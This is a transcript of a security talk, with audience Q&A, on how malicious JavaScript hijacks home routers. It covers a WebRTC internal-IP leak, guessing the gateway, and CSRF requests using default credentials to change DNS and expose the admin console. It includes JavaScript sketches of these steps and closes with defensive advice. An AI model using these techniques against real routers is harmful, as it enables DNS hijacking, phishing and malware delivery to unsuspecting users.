A lot of folks don't, right? I've seen a lot of tech-savvy folks not change their default credentials, right? And using these, attackers change settings on the internal router. So what happens in this case is a user browses to a website in a browser like Chrome or Firefox, right? And the browser loads a piece of JavaScript that uses WebRTC to figure out the internal IP address of the machine. This IP is then passed to another function that uses it to construct the presumed gateway address, right? And it loads an image, essentially trying to fingerprint the internal router, right? Whether it's a D-Link or TP-Link or whatever. The image URL has the default credentials embedded in it, so that it gets through the basic auth. And on successful load of the image, additional functions are called to change particular settings inside the router configuration. For example, look at this very simple HTML page, right? There's a win-an-iPhone link, and you want to win an iPhone, so you go there. What happens on body onload is that a function is called which essentially uses WebRTC to obtain your internal IP address, right? Once your internal IP address is obtained, another function called doChanges is called, right? This obtains, rather constructs, your gateway IP address, and this is a very condensed form of the real code, right? In reality, you would not assume that your gateway is .1; you'd try different variations, right? And different port numbers, for that matter. This particular one is a TP-Link exploit, but there are exploits available for different types of routers out on the internet. So what we have here is essentially writing a div that loads an image whose source is admin:admin at the gateway, and then images/logo, with height one and width one, right? And if the load of that image is successful, it runs a function called setDNS, which is here.
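The gateway-guessing step is simple string work once WebRTC has leaked the internal IP. A sketch of just that part (the WebRTC leak itself needs a browser; the candidate last octets and ports below are assumptions, real code tries more variations):

```javascript
// Given an internal IP leaked via WebRTC (e.g. "192.168.1.37"),
// derive likely gateway URLs to fingerprint with image loads.
function guessGateways(internalIp) {
  const prefix = internalIp.split(".").slice(0, 3).join("."); // "192.168.1"
  const lastOctets = [1, 254];   // common router addresses on the subnet
  const ports = [80, 8080];      // common admin-console ports
  const urls = [];
  for (const octet of lastOctets) {
    for (const port of ports) {
      urls.push(`http://${prefix}.${octet}:${port}/`);
    }
  }
  return urls;
}

console.log(guessGateways("192.168.1.37"));
// [ 'http://192.168.1.1:80/', 'http://192.168.1.1:8080/', ... ]
```

Each candidate URL is then probed with a 1x1 image load; whichever one loads tells the script both which address the router lives at and, depending on the image path, often which model it is.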
So what happens in setDNS is simple: a new Image is created whose source attribute points to this URL, right? And if you notice, this is a GET request that changes the DNS settings, right? From our HTTP days, a GET is not supposed to change server content, right? A GET is supposed to be a safe, idempotent request, right? The essential idea being that methods like POST, PUT and DELETE are supposed to be the ones that change content on the server. But we've seen real-world implementations on the internet where a GET request changes something, right? Developers use GET parameters to change server-side data for a user. In this case, the router's DNS settings are being changed using a GET request, and in the second one, the router's administration console is being made public, right? So that the attacker can then access the administration page remotely, over the internet. What could go wrong from here are multiple things, the most obvious case being an active or passive man-in-the-middle attack, or a phishing attack to steal credentials by loading attacker-controlled domains. If an attacker is able to take control of your DNS, it means the attacker can make you go to any website while making it look like you're on the right website, because DNS is what controls what you see, the content, right? Your browsers don't understand anything else, right? The URL, the domain, is only for humans to feel nice about where they are. What the internet requires is for the domain to point to the correct IP address, which is resolved by DNS. The moment the DNS is attacker controlled, it's already game over, right? Worse, program updates fetched from malicious domains can push binaries onto the system. Suppose you're on a network whose DNS is something that you don't control, right? The DNS can, you know, when one of your programs tries to fetch an update, right?
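The two GET requests just described can be sketched as URL builders. The paths and parameter names below are made up for illustration (real ones differ per router model and firmware), but the shape, state-changing GETs fired from an image load, is exactly the problem:

```javascript
// Build TP-Link-style state-changing GETs; paths/params are illustrative only.
// Default credentials ride along as HTTP Basic auth embedded in the URL.
function buildDnsChangeUrl(gateway, attackerDns) {
  return `http://admin:admin@${gateway}/userRpm/dns?dnsserver=${attackerDns}`;
}

// Second request: expose the admin console to the internet.
function buildRemoteAdminUrl(gateway) {
  return `http://admin:admin@${gateway}/userRpm/management?remote=1&port=8080`;
}

// In the attack page these become invisible image loads, e.g.:
//   new Image().src = buildDnsChangeUrl("192.168.1.1", "203.0.113.5");
// The browser fires the GET; the router treats it as an authenticated change.
console.log(buildDnsChangeUrl("192.168.1.1", "203.0.113.5"));
```

This is why routers that change state on GET, and browsers that happily attach URL-embedded credentials, make such an easy CSRF target: no response needs to be read, so the same-origin policy never gets a chance to help.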
Suppose Visual Studio Code, for that matter, does an auto-update as soon as it starts, and the DNS resolution points it to a different binary. If there's no signature verification of the downloaded binary, you would end up running a malicious executable. The attacker essentially has full visibility and control of the target network if the attacker can control DNS. A couple of closing notes. I was afraid that I wouldn't make it in time, but to close: JS is not only used to build stuff, it's actually used by attackers to do all sorts of cool things, right? For developers: do not trust user input, anytime, anywhere, regardless of where it is coming from, trusted environments or non-trusted environments. Users: patch your browsers, update your apps, change default credentials everywhere, right? Be wary of the sites you visit, and trust me, there is no Nigerian prince who wants to give you money. Okay? Thank you so much. These are the references that I've used. This is my contact information. Thanks, Riyaz. Any audience questions? Anything that you want to ask? I'm sure you have a lot of security questions. I'll be available throughout the day, so if you want to come and talk to me, you can do that. I mean, feel free to ask your questions; there's no point in keeping them in your head. Yeah? A lot of times one of you has a question and then you ask. There's one at the back, I can see. Karen has a question. If I heard you correctly, your question is: do modern browsers protect against drive-by downloads? Yeah. So it's not a question about how modern the browser is. If the browser has an unpatched vulnerability, right? Or if there's an exploit available for the browser. And browser vendors, for that matter, take browser security very seriously. Even crashes, for that matter.
When I put the slides out, there is another section on browser fuzzing that I didn't cover because of time, but I'll have it in the slides. Essentially, there are companies that pay you for finding crashes in browsers, right? It may not be an exploitable bug, right? You might be limited by your own capability to develop exploit code. But if you are able to successfully crash a browser, there are companies that are willing to pay, because this is lucrative in terms of attacking users. The idea being that if you have a browser that's vulnerable to JavaScript being able to push content to your system, right? Especially when you've not even initiated the traffic. What would happen in that case is that because it's a vulnerability they're exploiting, it doesn't matter whether the browser is modern or not; you would definitely be vulnerable. But the alternative, as I mentioned in the slide, is that attackers assume you probably have a patched browser. What they rely on then is the user's inability to differentiate between content that is malicious and content that is not. If you're trying to download a torrent, for example, and you go to any of the shady websites where you'd get your torrent file, there'll be one tiny link somewhere down the page that is the actual link to download the torrent, but there'll be one large, big Download Now button that will actually download something else onto your system, right? I've seen a lot of students do this, where they'll be like, I got a torrent, but it was a .exe. That's not how torrents work; torrents have a .torrent extension, right? They clicked on the big Download Now button. And that's what attackers rely on. Thanks. Any other questions from the audience? Thanks, Riyaz. Thank you so much, folks.